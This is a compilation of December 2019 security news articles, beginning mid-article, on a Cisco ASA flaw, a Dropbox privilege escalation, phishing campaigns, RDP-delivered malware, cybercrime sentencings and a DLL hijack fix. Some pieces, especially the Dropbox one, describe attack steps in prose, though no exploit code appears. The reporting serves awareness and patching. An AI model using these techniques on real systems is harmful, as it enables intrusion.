The company is issuing a warning to its customers urging them to follow recommendations for proper mitigation actions.

DoS and sensitive info
Tracked as CVE-2018-0296, the vulnerability can be leveraged by an unauthenticated, remote attacker to cause the appliance to reload by simply sending it a crafted HTTP request.

An attacker can also exploit this bug to view sensitive system information without authentication. On affected devices, this is achievable through path traversal techniques.

First exploit attempts in the wild were registered immediately after Cisco disclosed the details of the bug and published patched software for the products affected. At the time, the attackers aimed at causing a DoS condition.

At the end of the workweek, though, exploitation attempts in the wild grew to a number sufficiently high for Cisco to advise ASA and Firepower customers to make sure that the devices run on a version of code that is not vulnerable to CVE-2018-0296.

The attacks have been happening for several weeks and kept increasing in frequency, suggesting that there sufficient victims still exist for the effort to be worth it.

Check for risk
Admins that want to determine if the products they manage are vulnerable can start by running the following command:

show asp table socket | include SSL|DTLS
Potential for exploitation exists if listening sockets are shown. However, a vulnerable process needs to be running for things to get ugly. Finding out its status is done through this command:

show processes | include Unicorn
"The likelihood of a vulnerability existing is elevated" on devices that have this process running, writes Nick Biasini, threat researcher at Cisco Talos.

In this case, to determine if there is a risk, admins should check if the software version running on their devices is impacted by the bug. The information is available in the original advisory for the vulnerability.

The reason for making this check before deciding to update the code to a newer version is that the vulnerability is in the web framework of ASA/Firepower products, so not all appliances are affected.

Biasini warns that despite not being a new vulnerability, it still poses a real risk for denial of service and unauthenticated information disclosure as attacks are increasing.

With holidays around the corner, companies have less staff on duty and adversaries are likely to take advantage.

"Customers should validate if they are vulnerable as soon as possible and plan the appropriate patching/mitigations strategies as necessary to minimize both risk and impact to the organization," Biasini advises.


Dropbox Zero-Day Vulnerability Gets Temporary Fix
22.12.2019 
Bleepingcomputer  Vulnerebility

A zero-day vulnerability exists in Dropbox for Windows that allows attackers to gain permissions reserved to SYSTEM, the most privileged account on the operating system.

The unpatched security flaw affects standard Dropbox installations. It relates to the updater that runs as a service and is responsible for keeping the application up to date.

Dropbox has yet to release a new version that patches the flaw but a temporary solution is freely available in the form of a micropatch.

Short-term fix
Security researcher Decoder and Chris Danieli discovered the vulnerability and created proof-of-concept exploit code to validate the findings.

They say that they informed Dropbox of the issue on September 18 and allowed a 90-day period before making a public disclosure. The company responded saying that the problem was known and a fix would become available before the end of October.

Until Dropbox rolls out a better version, an interim solution can be applied via 0Patch, a platform that delivers micropatches for known issues before a permanent, official fix becomes available.

Describing the issue on Twitter, Mitja Kolsek, CEO of Acros Security company behind 0patch, says that a local low-privileged attacker can use it to replace executable run by a process with SYSTEM-level rights.

“While analyzing the issue, we decided that the most reliable fix would be to simply cut off the log-writing code from DropBox Updater. This doesn't seem to negatively impact either DropBox functionality or the update process - it just leaves the log file empty, potentially making it harder for DropBox to troubleshoot issues on user's computer. (Clearly, not being vulnerable trumps that.)” - Mitja Kolsek

These tiny pieces of code correct only the vulnerable part and are applied in memory while the system running, so they work without rebooting.

Kolsek was able to create the Dropbox patch faster with the help of CERT/CC vulnerability analyst Will Dormann, who provided technical clarifications and proof-of-concept code that showed how the bug could be exploited.

Technical details, no PoC
In a blog post this week, Decoder offers details for leveraging the vulnerability to elevate privileges on an already compromised host. The exploit code is not provided, since the purpose of the disclosure is to “share knowledge, not tools.”

The researcher says that they tested the privilege escalation vulnerability on version 87.4.138 of the software, which is the latest release at the moment of writing.

The method and techniques for exploitation take advantage of the Dropbox updater, which is installed as a service with two scheduled tasks that run with SYSTEM permissions.

The two researchers found that the ‘dropboxupdate’ service writes the log files to ‘C:\ProgramData\Dropbox\Update\Log’ where standard users are also allowed to add, overwrite, and delete files.

Furthermore, the SYSTEM‌ account makes a SetSecurity call on the files in this location, which opens the door to exploitation via hard links.

One of the challenges overcome by the researchers was to use a log file that could be used with the updater process.

“But we have a problem here, we have to “guess” the logfile name, that is the exact time (including milliseconds) and the PID of the updater process” - Decoder

The solution was to cause the update process to hang and performing hard link spraying by creating 999 links that respect a specific naming convention, all pointing to the target file. Of help in their endeavor were testing tools developed by James Forshaw of Google Poject Zero.

A test on the Windows license agreement file - license.rtf, in System32 proved that the solution works and allows overwriting files controlled by the SYSTEM‌ account.


After more poking around, the researchers also found a way to gain a shell with SYSTEM‌ privileges. They were able to achieve this by logging off and back on after overwriting DropboxCrashHandler.Exe with a malicious executable.

A video proving the success of this method is available below:

Local access is a prerequisite for exploiting this bug; nevertheless, compromising a computer is not difficult and a privilege escalation bug allows taking the attack past the initial stage.

Fixing the vulnerability requires stricter permissions a normal user has for the Log folder in Program Data. Dormann says that the number of privilege escalation vulnerabilities on Windows increased lately.

An explanation for this came from Kolsek, who points out that the likely cause for this are the default permissions on the Program Data directory.

It's all about *explicitly* setting permissions. Program Files is secure by default through inheritance. ProgramData is not.

— Will Dormann (@wdormann) December 19, 2019


PayPal Phishing Attack Promises to Secure Accounts, Steals Everything
22.12.2019 
Bleepingcomputer  Phishing
An ongoing phishing campaign is targeting PayPal customers with emails camouflaged as 'unusual activity' alerts warning them of suspicious logins from unknown devices and attempting to squeeze them dry of all their credentials and financial info.

As the ESET researchers that spotted these attacks discovered, the phishers are attempting "to trick users into handing over considerably more than ‘only’ their access credentials to the payment service."

To make sure that the potential victims are scared straight and more than willing to click on the link embedded within the phishing message, the attackers say that their accounts are limited until they're secured by confirming their identity.

"Please log in to your PayPal account and complete the steps to confirm your identity. To help protect your account, your account will remain limited until you complete the necessary steps," the phishing bait emails say.

"The security of your PayPal account is a top priority for us and we want to work together to help protect it."

Phishing email sample
Phishing email sample (ESET)
Victims squeezed out one step at a time
After the target lands on the PayPal-branded phishing site, the phishers will again remind them that they need to prevent unauthorized access to secure their accounts, asking them to confirm their 'informations' by entering a CAPTCHA code displayed on the page.

"The manufactured sense of urgency is not the only telltale sign to tip you off that something is amiss," ESET's researchers explain. Other giveaways include the odd URL (though partly obfuscated here for security reasons), substandard English, chopped-off letters, and the use of a CAPTCHA."

In the next step, the victims are taken to a series of fake login pages designed to harvest their PayPal usernames and passwords, but the data collection process doesn't end here.

After hitting the login button, the phishing chain continues with a page that requires the victims to verify their accounts by updating their information if they want to remove the "limits" and fully restore them.

Account verification phishing page
Account verification phishing page (ESET)
In the next few steps, the victims will be asked to fill out their billing addresses (including their name, phone number, and date of birth), as well as their credit and debit card data to avoid having to filling it out again later while using PayPal.

To make sure that they don't useless information, the attackers will also require the victims to confirm their credit and debit card info by entering their account numbers, the security code on the back of the card, and their mother's maiden names.

In the last step, their e-mail's password will also be requested so that the attackers can get access to other accounts in the future — however, they do promise not to use the password.

SSL secured phishing landing pages
Once the malicious campaign's operators manage to successfully squeeze the last piece of sensitive info out of their victims, they will send them to a page designed to ease their mind by congratulating them for restoring access to their accounts, assuring them that their "accounts will be verified in the next 24 hours."

Account restored
PayPal account restored, everything else stolen (ESET)
Throughout the campaign, the attackers used multiple phishing domains with names designed to somewhat resemble an official PayPal site.

All the phishing sites were delivered via HTTPS secured connections, displaying a green padlock to increase the targets' trust and give them a semblance of legitimacy.

As the researchers further found, one of the domains was registered using NameCheap on December 5, with the registrant info protected using WhoisGuard and having a Cloudflare SSL certificate valid between December 4, 2019, and October 9, 2020.

Phishing domain SSL certificate and Whois info
Phishing domain SSL certificate and Whois info (ESET)
"It’s worth noting that we’ve found no evidence that this campaign results in the installation of malicious software on victims’ machines," ESET adds.

"And, as this scam starts with a phishing email, the usual precautions will go a long way towards helping you stay safe."

How to avoid getting phished
The researchers recommend checking the URL of the website you land on after clicking a link you were sent via email and, if possible, refrain from clicking any links or opening any attachments you received in your inbox.

The safest way is to write the address of the site manually in the web browser or use a previously created bookmark if available to avoid being redirected to sites designed to collect your info or infect your computer with malware.

PayPal also provides a series of recommendations on how to spot phishing e-mails in its Help Center site, advising users not to reply to emails, click any embedded links, or downloading and opening attachments.

PayPal lists the following signs you can look for to identify phishing messages easier:

• Impersonal, generic greetings are used; such as “Dear user” or “Dear [your email address]”
• Ask you to click on links that take you to a fake website
• Contain unknown attachments
• Convey a false sense of urgency
• "Your account is about to be suspended," "You've been paid," or "You have been paid too much" warnings
Customers who have spotted a phishing message in their inbox posing as an official email sent by PayPal are asked to report it as soon as possible by forwarding it spoof@paypal.com and to delete it as soon as possible.


How to Place Calls From Windows 10 Using the Your Phone App
22.12.2019 
Bleepingcomputer  Apple

Microsoft’s Your Phone is an app designed for Windows 10 that lets you see Android phone notifications, photos and messages on your desktop. It also comes with the handy ability to mirror Android apps to your Windows 10 device.

In the latest Your Phone update, Microsoft has introduced a new feature that lets you place and receive phone calls on your Android device within Windows 10.

Once configured, you'll be able to enjoy a complete phone calling experience on your desktop, including accessing the phonebook, searching your contacts, viewing your call history and placing calls from your desktop.

To do this you will need to pair your Android smartphone to Windows 10 via Bluetooth and then connect both devices to the internet.

How to place and receive calls on Windows 10
Download and install Your Phone from the Microsoft Store.
Launch the Your Phone app and click Get Started.
Sign-in with your Microsoft account and click 'Continue'.
To link your phone, download Your Phone Companion app from the Play Store.
Sign-in with the same Microsoft account.
Follow the on-screen instructions to finish the process.
Once you have connected your Android device to the Your Phone app, you'll be able to access the phone calling experience by clicking on the 'Calls' option on the right side of the application.

To establish a connection for calling, make sure Bluetooth is enabled on both devices and Focus Assist is turned off on Windows 10.

Your Phone

Once your devices are synced up, you can see the call history and a dial pad. You can now send and receive calls and send voice notes as well.

We tried out the feature on Windows 10 November 2019 Update with the Android 9-powered smartphone, and the results were surprisingly good.

 


Apple Blackmailed for $100K in iTunes Cards to Avoid 'Data Leak'
22.12.2019 
Bleepingcomputer  Apple

22-year old Londoner Kerem Albayrak was sentenced today after attempting to blackmail Apple by threatening to factory reset 319 million iCloud accounts and selling the users' data.

Albrayk pleaded guilty to one count of blackmail and "two counts of unauthorized acts with intent to impair the operation of or prevent/hinder access to a computer" on December 2.

Today, at Southwark Crown Court, he got a second chance as he was sentenced to a two year suspended jail term, a six-month electronic curfew, and 300 hours of unpaid community work.

When asked about some of his activities, Albayrak told NCA investigators “once you get sucked into it [cyber crime], it just escalates and it makes it interesting when it’s illegal.” The fame-hungry cyber-criminal went on to say “when you have power on the internet it’s like fame and everyone respects you, and everyone is chasing that right now.” - National Crime Agency (NCA)

Blackmailing Apple
Albayrak demanded a ransom of a thousand $100 iTunes gift cards or $75,000 in crypto-currency from Apple via email on March 12, 2017.

"A week later Albayrak filmed himself accessing two apparently random iCloud accounts," the NCA said in a press release published today.

"He posted the video on YouTube and sent the link to Apple security, as well as multiple media outlets. Two days later the demand increased to $100,000 and a threat to factory reset every iCloud account in his possession."

After Apple reached out to UK and US law enforcement agencies, NCA’s National Cyber Crime Unit found and arrested the man at his Hornsey, North London home.

"Hello Apple I've decided to use all my servers and macroscripts on these accounts," he told Apple in one of his emails according to a DailyMail report. 'If I don't get by payment by 3 December I will be hacking every iCloud account I have extracting all the notes and dumping them online.'

Hacker who tried to blackmail Apple by threatening to delete 319 million accounts has been sentenced following an NCA investigation.

Read more https://t.co/PcnX2iM7Wo pic.twitter.com/wlCJMCRJJr

— National Crime Agency (NCA) (@NCA_UK) December 20, 2019
The investigators also seized electronic equipment including computers, a phone, and a hard drive, which allowed them to discover that Albayrak was claiming to be the spokesperson of a group of hackers named "Turkish Crime Family."

NCA's investigation also showed that the young Londoner wasn't in possession of the data he claimed to have but, instead, he was flaunting credentials leaked by other online services that were mostly inactive.

"Albayrak wrongly believed he could escape justice after hacking into two accounts and attempting to blackmail a large multi-national corporation," NCA Senior Investigative Officer Anna Smith said.

"During the investigation, it became clear that he was seeking fame and fortune. But cyber-crime doesn’t pay," she added.

 


GozNym Gang Members Behind $100 Million Damages Sentenced
22.12.2019 
Bleepingcomputer  CyberCrime

Three members of a cybercrime group that used the GozNym banking Trojan to steal millions from U.S. businesses were sentenced today in parallel and multi-national prosecutions in Pittsburgh and Tbilisi, Georgia.

The GozNym group members were charged for stealing "an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions" according to a Europol press release from May.

In all, ten members of the GozNym cybercriminal group were indicted in May, five of them being arrested at the time, while five other Russian nationals charged in the indictment — including the developed behind the GozNym malware — remain on the run.

The indictment unsealed in Pittsburgh, USA, in May, charged GozNym members for conspiring to:

infect victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
use the captured login credentials to fraudulently gain unauthorized access to victims’ online bank accounts;
steal money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.
The malware used in the attacks is a "Trojan hybrid spawned from the Nymaim and Gozi ISFB malware," a strain used "in attacks against more than 24 U.S. and Canadian banks" per IBM X-Force Research.

GozNym was delivered on the targets' computers via massive scale malspam campaigns that targeted hundreds of thousands of individuals and organizations, and it was utilized to steal banking credentials from their victims' infected systems.

The GozNym banking Trojan payloads and the malicious domains used in the attacks were hosted on the infrastructure of the Avalanche malware distribution network dismantled in 2016 when law enforcement seized, sinkholed, and blocked over 800,000 domains spread over 60 registrars.

Three members of GozNym cybercrime network sentenced in parallel multi-national prosecutions in Pittsburgh and Tbilisi, Georgia. https://t.co/zpAO6wqCof pic.twitter.com/Qz9UyQnG0I

— WDPAnews (@WDPAnews) December 20, 2019
GozNym members' sentences
Bulgarian citizen Krasimir Nikolov was sentenced today in federal court in Pittsburgh "to a period of time served after having served more than 39 months in prison following his conviction on charges of criminal conspiracy, computer fraud, and bank fraud."

His main role in the criminal organization was of account takeover specialist and casher, using online banking credentials stolen with the help of the GozNym malware to try and transfer victims' money to attacker-controlled accounts.

"Nikolov will be transferred into U.S. Immigration and Customs Enforcement custody and removed from the United States to Bulgaria," according to the DoJ press release.

Two other GozNym gang members, Alexander Konovolov and Marat Kazandjian (Konolov's technical admin and main assistant within the GozNym network) were also arrested and prosecuted in Georgia to 7 and 5 years of imprisonment, respectively.

Konovolov (aka NoNe or none_1) was the head of the organization and the one who set up the criminal network and controlled over 41,000 infected computers.

"Konovolov assembled the team of elite cybercriminals charged in the Indictment, in part by recruiting them through underground online criminal forums," the DoJ says.

A.K. (aka none_1) was sentenced to imprisonment for a term of 7 years. Considering the large extent of his cooperation with the investigation, M.K (aka phant0m)was sentenced to imprisonment for a term of 5 years. He will serve 1 year in prison and after this, he will be on conditional release for 4years. - Office of the Prosecutor General of Georgia

The Georgian trial was prosecuted with witness testimony from an FBI agent and a computer scientist from the FBI’s Pittsburgh Field Office, and evidence the FBI and U.S. Attorney’s Office obtained as part of their parallel investigation of the case.

"In announcing the prosecution of the GozNym international cybercrime syndicate with our law enforcement partners at Europol in May, I stated that borderless cybercrime necessitates a borderless response," said U. S. Attorney Brady.

"This new paradigm involves unprecedented levels of cooperation with willing and trusted law enforcement partners around the world who share our goals of searching, arresting and prosecuting cyber criminals no matter where they might be."


Tokyo 2020 Staff Warns of Phishing Disguised As Official Emails
22.12.2019 
Bleepingcomputer  Phishing

Tokyo 2020 Summer Olympics staff published a warning today alerting of an ongoing phishing campaign delivering emails designed to look like they're coming from the Tokyo Organizing Committee of the Olympic and Paralympic Games (Tokyo 2020).

Tokyo 2020 is a multi-sport international event scheduled to take place next year between 24 July to 9 August in Tokyo, Japan, with some preliminary competition events to start on 22 July.

"We have recently detected emails disguised to look like they are coming from a Tokyo 2020 staff member," says Tokyo Olympic Organizing Committee's warning message.

"Although the email may look official and legitimate, if you have no reason to receive such an email or if the content is questionable, you should not click on the link or open any attached files."

They are also that the phishing emails will most likely redirect the recipients to phishing sites or infect their computers with malware if opened.

#Attack #Email #Tokyo2020
They have recently detected emails disguised to look like they are coming from a Tokyo 2020 staff member. pic.twitter.com/qjUGQe0w70

— blackorbird (@blackorbird) December 20, 2019
Olympics phishing attacks planned on the dark web
This is not the first time such attacks against next year's Tokyo 2020 Olympics were on the table, with both American and Japanese recipients being picked as potential targets of a phishing campaign by a hacker group in discussions on the dark web according to a KYODO NEWS report.

"Looking at their dialogue, there is a high possibility that the hacking group is of Chinese origin," Antuit's Japanese branch VP Shuhei Igarashi told the news outlet in September.

"More cyberattacks that target the Tokyo Olympics can be expected as the world focuses on the sporting event," Igarashi added.

The security outfit also said that an attack focused on the United States and Japan was already going at the time they were observing the hackers' dark web activity.

Tokyo 2020's staff said at the time that they "have been raising public awareness that tickets sales have not started yet" to decrease the possibility of such attacks being successful.

"Assuming phishing scams will occur, we will continue to gather information and give the heads-up," the Tokyo Olympic Organizing Committee also stated.

Cyber-espionage group targets sporting organizations
Microsoft's Threat Intelligence Center also reported in October that significant cyberattacks targeting and, in some cases, compromising the systems of several anti-doping authorities and sporting organizations around the world starting with September 16, ahead of the Tokyo Summer Games in 2020.

Microsoft attributed the attacks to the STRONTIUM APT group (also tracked as Fancy Bear, Sednit, Sofacy, Sandworm, or APT28), a cyber-espionage group previously connected to a multitude of campaigns targeting governments, including the Democratic National Committee hack ahead of the 2016 U.S. Presidential Election.

"The methods used in the most recent attacks are similar to those routinely used by Strontium to target governments, militaries, think tanks, law firms, human rights organizations, financial firms and universities around the world," Microsoft stated.

The hackers were not successful in all their attacks and it is not yet known how many agencies were hacked, but Microsoft said that it notified customers affected by the attacks and also worked with those asking for help to secure their compromised systems or accounts.


Windows Remote Desktop Services Used for Fileless Malware Attacks
22.12.2019 
Bleepingcomputer  Virus

Threat actors breaching company networks are deploying a cornucopia of malware over the remote desktop protocol (RDP), without leaving a trace on target hosts.

Cryptocurrency miners, info-stealers, and ransomware are executed in RAM using a remote connection, which also serves for exfiltrating useful information from compromised machines.

Exploiting Windows RDS features
The attackers leveraged a feature in Windows Remote Desktop Services that allows a client to share local drives to a Terminal Server with read and write permissions.

These drives appear on the server as a share on a virtual network location called 'tsclient' followed by the letter of the drive and can be mapped locally.

The feature has been around for a long time, and properly explained what happens when a user connects to the server and runs an application.

Access to the resources shared this way is possible through RDP and no trace is left on the client machine's disk as applications execute in memory. When an RDP session terminates, so do associated processes and memory is typically released.

Malware cocktail in network shares
Malware analysts at Bitdefender found that adversaries take advantage of this feature and drop multiple malware of various types along with a component named 'worker.exe' that receives instructions from the attacker.

In use since at least February 2018, 'worker.exe' is an off-the-shelf tool used by multiple threat actors, especially for its reconnaissance capabilities.

Among the details this component can collect from a system are the following:

System information: architecture, CPU model, number of cores, RAM size, Windows version
domain name, privileges of the logged user, list of users on the machine
local IP address, upload and download speed, public IP information as returned by the from ip-score.com service
default browser, status of specific ports on the host, checking for running servers and listening on their port, specific entries in the DNS cache (mainly if it tried to connect to a certain domain)
checking if certain processes are running, existence of specific keys and values in the registry
These features are complemented by the ability to take screenshots and to enumerate all connected network shares that are mapped locally.

Apart from this, 'worker.exe' was seen executing at least three separate clipboard stealers (MicroClip, DelphiStealer, and IntelRapid), two ransomware families (Rapid and Rapid 2.0, and Nemty), multiple Monero cryptocurrency miners (all based on XMRig), and, since July 2018, the infamous AZORult info-stealer.

Samples of 'worker.exe' were found in a 'tsclient' network share and noticed that they did not connect to a command and control (C2) server for instructions. Instead, it took commands from a text file named 'config.ins' in the same location.

All information collected from the host goes into a .NFO file that is stored in the same location as the configuration file.

This is a convenient way to keep the data off the compromised computer and make the forensic analysis more difficult.

A pretty penny
The purpose of all three clipboard stealers is to determine when the user copies a cryptocurrency wallet address and replace it with one belonging to the attacker.

This way, any outgoing transaction will miss its intended destination and find its way into the cybercriminal's pockets.

Of these three pieces of malware, IntelRapid is more advanced. It can recognize a much larger number of cryptocurrency wallets (Bitcoin, Litecoin, Ethereum, Monero, Bitcoin Cash, Dash, Ripple, Dogecoin, Neo, and ZCash) and replaces them with similar alternatives provided by the attacker.

Using a "complex scoring mechanism," the malware picks replacements that begin or end with the same characters as the victim's address. This is most likely to fool users that are more attentive to the pasted wallet address.

Wallet address replacements starting/endign as the original
Depending on the cryptocurrency, IntelRapid could check in excess of 1,300 addresses to find strings that are similar to the original one from the victim.

From analyzing the replacement addresses, Bitdefender determined that the clipboard stealers were deployed by the same threat actor.

Further investigation into other malicious components indicated a connection with the ransomware families, the cryptocurrency miners, and the AZORult info-stealer sample they analyzed.

The earnings from the clipboard stealers, based on transactions for replacement addresses in a main cluster, amounted to $150,000. The real profit is likely much larger, though, since Monero was not included.

On the same note, other revenue streams have also been left out since they could not be estimated, such as money generated by the cryptocurrency miners or from the ransomware payloads.

Original point of compromise
From their findings, the researchers could not work out how the attacker gained access to the network in the first place or how they managed to plant 'worker.exe' on the 'tsclient' share.

Also a mystery is how the adversary got valid RDP credentials to access a victim host; bruteforcing being is one possibility.

It is important to note that professional network intruders that break into the digital perimeter of a company often advertise their access on underground forums.

Cybercriminals interested in any of the targets can pay between a few hundred USD to thousands and more for access, or to have their malware dropped.

This is a typical scenario for ransomware affiliates who many times partner with such access-as-a-service providers to get to large targets that can be asked to pay a higher ransom to have their files decrypted.

Victims across the world
The campaigns observed by Bitdefender are likely not discriminating between the targets that can be compromised. This indicates cybercriminal in the money-making game.

"From our telemetry, these campaigns do not seem to target specific industries, instead trying to reach as many victims as possible" - Bitdefender

Most of the victims are in Brazil, the U.S., and in Romania, the researchers note in a report this week.

As visible from the spread of the victims across the globe, the attacker is not interested in certain victims but cares more if they come in great numbers.

Preventing this type of attack is not difficult and can be done by disabling drive redirection from the list of group policies. The option is available by following this path in the computer configuration applet:

Below is the full path:

Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Device and Resource Redirection


Former IT Employee Jailed for Taking Down Airline Systems
22.12.2019 
Bleepingcomputer  Crime

Scott Burns, a former employee of information and communications technology (ICT) provider Blue Chip was sentenced to 10 months in prison for taking down the computers of British airline Jet2.com Limited (aka Jet2) for over 12 hours.

Jet2 is one of the largest airlines in the United Kingdom and a Dart Group PLC subsidiary, and it has a history spanning over 30 years.

UK National Crime Agency (NCA) officers arrested the 27-year-old man on 8 February 2018, seizing several electronic devices from his home including computers and phones.

Burns pleaded guilty to eight offenses under the Computer Misuse Act in November 2019 and was sentenced yesterday at Leeds Crown court.

An ex-employee has been jailed after admitting to carrying out cyber attacks against Jet2 which took down their computer systems for more than 12 hours.

Read more https://t.co/6xQuvEkvbg pic.twitter.com/p1bQF9qHSS

— National Crime Agency (NCA) (@NCA_UK) December 19, 2019
Jet2 network intrusion
He worked for Blue Chip on the Jet2 account until December 2017, when he moved to another company, however, the disgruntled ex-employee decided to illegally access the Jet2 account twice during January 2018 after leaving the ICT provider.

"After gaining access to the Jet2 network on 18 January, Burns removed a folder which stored all user account details, preventing at least 2,000 members of staff from logging into their network accounts and accessing their emails," UK's National Crime Agency (NCA) says.

Following forensic analysis of his seized computers and by examining the data provided by Dart Group's infrastructure team, the NCA investigators discovered that the former employee infiltrated Jet's network a second time on January 3 able in "a scoping exercise, assessing the security of their systems in preparation for his later attack."

Kevin Beaumont

Burns also hacked into the email account of the company’s CEO multiple times to check if the airline had any evidence that would incriminate him and what was being discussed regarding the incident within the company.

While still on Jet2's network, he also deleted the detailed logs that could have exposed his activity on Jet2's network in an effort to cover his tracks.

Chat records found on his phone show Burns saying he is “finally sick and tired of BC/Jet2” and he describes leaving Blue Chip as “freeeedom”. On the same phone, he had looked up the prison sentence for network intrusion in the UK on Google. - NCA

"Network intrusion is not a victimless crime. Not only did Burns’s actions have a potential financial impact on Jet2, it caused huge disruption to their staff and technical operations," NCA investigator Jamie Horncastle said.

“These are serious offenses. The evidence secured internally by Dart Group was extremely beneficial to this investigation.

"I would always encourage victims of such attacks to preserve as much evidence as possible in the immediate aftermath – it will assist law enforcement in catching the perpetrator.”


AdwCleaner 8.0.1 Fixes DLL Hijacking Vulnerability
21.12.2019
Bleepingcomputer  Vulnerebility

Malwarebytes has released AdwCleaner 8.0.1 and in addition to various improvements to the tool's scanning engine, it also fixes a DLL hijacking vulnerability.

The AdwCleaner malware and adware cleaning program has had a DLL Hijacking vulnerability in versions older than 8.0.1, which was released yesterday.

For those not familiar with a DLL hijack vulnerability, it is important to give a little background on how DLLs are loaded by programs.

When a program starts it will load various DLLs that it needs to operate. If the developer did not specify the path to the DLL, the program will attempt to load the DLL from the current directory, and if it does not exist, it will check other folders in the user's path.

This allows an attacker or malware to create a malicious DLL with the same name as one that AdwCleaner normally loads and place it in an accessible folder in the user's path.

When AdwCleaner is launched it will attempt to load the required DLLs, including the malicious DLL. As AdwCleaner runs with Administrative privileges, this means that the malicious DLL will be executed with elevated privileges as well and can run malicious commands as an administrator.

Below you can see an example of the DLL Hijacking vulnerability being exploited using the Sentinel Vulnerability and Exploit Detector tool.

AdwCleaner DLL Hijacking
AdwCleaner DLL Hijacking
This vulnerability was discovered by Günter Born who disclosed it to Malwarebytes on December 10th, 2019.

Jérôme B, the developer of AdwCleaner, told BleepingComputer that this vulnerability was fixed by enforcing the loading paths to the DLLs.

"Yes, we didn't properly enforce the loading path for DLLs, so unprivileged users could add a specially crafted one and get privesc."

Other changes in AdwCleaner 8.0.1
While the DLL Hijacking vulnerability fix is definitely welcome, it is not the only improvement in this version.

With this release, AdwCleaner 8.0.1 once again has a Firefox cleaning module that can be used to scan for and remove malicious Firefox extensions, search engines, start pages, and preferences.

The full changelog for AdwCleaner 8.0.1 can be read below:

New Features
Re-Implement Firefox module. It now properly support detecting and removing extensions, startpage, sear chengines, preferences...
Changes
Hide debug output
Update telemetry internals.
Update definitions to 2019.12.17.1
Bugfixes
Fix a DLL Hijacking vulnerability in AdwCleaner 7.0+, reported by Günter Born.


Fake Star Wars Streaming Sites Steal Fans’ Credit Cards
21.12.2019
Bleepingcomputer  CyberCrime

Attackers are actively exploiting the hype around the new Star Wars: The Rise of Skywalker movie as a bait designed to lure potential victims on fake streaming sites and steal their credit card data.

Given that the movie will be released in theaters on December 20, phishers have the perfect decoy to attract fans who would want to get an early look at the new Star Wars movie.

Highly popular films are often used as baits in social engineering attacks that would draw the attention fans with the promise of an early preview either on decoy streaming sites or with the help of malicious files camouflaged as early release movie copies.

Fake streaming site
Fake Star Wars streaming site (Kaspersky)
Over 30 sites used in credit card phishing attacks
"Kaspersky researchers found over 30 fraudulent websites and social media profiles disguised as official movie accounts (the actual number of these sites may be much higher) that supposedly distribute free copies of the latest film in the franchise," a press release published today says.

"These websites collect unwary users’ credit card data, under the pretense of necessary registration on the portal."

Kaspersky's research team also found 65 malicious files that were camouflaged as copies of the Star Wars: The Rise of Skywalker movie, as well as several profiles on Twitter and other social media platforms disguised as official accounts that distribute free copies of the movie and promote the malicious streaming sites.

Actually, instead of getting a free pirated copy of the new Star Wars installment, the victims would get their computers infected with malware.

"Coupled with malicious files shared on torrents, this brings the criminals results," Kaspersky says. "So far, 83 users have already been affected by 65 malicious files disguised as copies of the upcoming movie."

“Star Wars”-themed malware attacks
2018 2019 Change
Attacks detected 257580 285103 10.00%
Number of unique files 16395 11499 -30.00%
Users targeted 50196 37772 -25.00%
Star Wars fans advised to proceed with caution
The researchers also found that the hype surrounding this movie franchise fueled such attacks throughout 2019, with 285,103 attempts to infect 37,772 users seeking to watch Star Wars movies being detected by Kaspersky this year, accounting for a 10% rise compared to last year.

Overall, the number of unique malicious files used by attackers to target Star Wars fans reached 11,499 in 2019, representing a 30% drop from 2018.

Kaspersky recommends movie and TV show fans to follow the following guidelines to avoid getting infected with malware or getting their credit card data stolen:

• Pay attention to the official movie release dates in theaters, on streaming services, TV, DVD, or other sources
• Don’t click on suspicious links, such as those promising an early view of a new film
• Look at the downloaded file extension. Even if you are going to download a video file from a source you consider trusted and legitimate, the file should have a .avi, .mkv or .mp4 extension, among other video formats, definitely not .exe
• Check the website’s authenticity. Do not visit websites allowing you to watch a movie until you are sure that they are legitimate and start with ‘https.’ Confirm that the website is genuine by double-checking the format of the URL or the spelling of the company name, reading reviews about it and checking the domains’ registration data before starting downloads
• Use a reliable anti-malware solution
"It is typical for fraudsters and cybercriminals to try to capitalize on popular topics, and ‘Star Wars’ is a good example of such a theme this month," Kaspersky security researcher Tatiana Sidorina states.

"As attackers manage to push malicious websites and content up in the search results, fans need to remain cautious at all times. We advise users to not fall for such scams and instead enjoy the end of the saga on the big screen."


Lithuanian Jailed for Stealing $120 Million From Google, Facebook
21.12.2019
Bleepingcomputer  Crime  Social

A Lithuanian man was sentenced today to five years of prison time after tricking Google and Facebook employees into wiring over $120 million into bank accounts he controlled as part of several business email compromise (BEC) fraud attacks spanning from 2013 to 2015.

He previously pleaded guilty to wire fraud, aggravated identity theft, and three counts of money laundering according to a Department of Justice press release from March 2019.

"Evaldas Rimasauskas devised an audacious scheme to fleece U.S. companies out of more than $120 million, and then funneled those funds to bank accounts around the globe," U.S. Attorney Geoffrey S. Berman said today.

"Rimasauskas carried out his high-tech theft from halfway across the globe, but he got sentenced to prison right here in Manhattan federal court."

As detailed in the guilty plea court documents, Rimasauskas agreed to forfeit $49,738,559.41 to the United States, "the amount of proceeds traceable to the offense in Count One of the Indictment that the defendant personally obtained," representing the wire fraud charge.

Evaldas Rimasauskas before extradition verdict
Evaldas Rimasauskas before extradition verdict (Image: REUTERS/Andrius Sytas)
$99 million stolen from Facebook, $23 million from Google
According to the indictment, Rimasauskas registered and incorporated a company in Latvia using the same name as the Asian computer hardware manufacturer Quanta Computer Inc.

He also opened multiple bank accounts at banks from Cyprus, Lithuania, Hungary, Slovakia, and Latvia that he would later use to receive the fraudulent payments.

Phishing emails were then sent to Google and Facebook employees who "regularly conducted multimillion-dollar transactions with" Quanta representatives, instructing them to deliver large sums of money to Rimasauskas accounts.

He also used "forged invoices, contracts, and letters that falsely appeared to have been executed and signed by executives and agents of the Victim Companies, and which bore false corporate stamps embossed with the Victim Companies’ names, to be submitted to banks in support of the large volume of funds that were fraudulently transmitted via wire transfer."

After the funds were deposited in his accounts, Rimasauskas scattered the money to other bank accounts from six countries, trying to cover his tracks.

In addition to the prison term, Judge Daniels ordered RIMASAUSKAS to serve two years of supervised release, to forfeit $49,738,559.41, and to pay restitution in the amount of $26,479,079.24. - DoJ

Even though the indictment did not specifically identify Google and Facebook as the US companies that got tricked in the BEC scammer's attacks, Reuters reported that "a Lithuanian court order in 2017 identified Google and Facebook as the victims."

